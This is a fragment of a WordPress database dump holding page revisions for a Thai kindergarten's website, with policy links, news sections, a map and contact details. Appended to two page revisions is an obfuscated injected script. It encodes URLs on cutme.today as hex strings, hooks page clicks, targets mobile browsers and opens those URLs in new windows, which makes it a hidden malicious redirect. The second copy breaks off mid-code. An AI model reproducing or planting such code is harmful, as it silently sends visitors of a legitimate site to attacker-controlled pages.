900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:57:11','2024-07-29 11:57:11','',19,'http://watprato.ssk.in.th/?p=135',0,'revision','',0),
(136,1,'2024-07-29 18:57:58','2024-07-29 11:57:58','<!-- wp:generateblocks/image {\"uniqueId\":\"d013bfab\",\"mediaId\":137,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-d013bfab\"><img class=\"gb-image gb-image-d013bfab\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/442507862_122150309288202781_2842318848400673504_n.jpg\" alt=\"\" title=\"442507862_122150309288202781_2842318848400673504_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 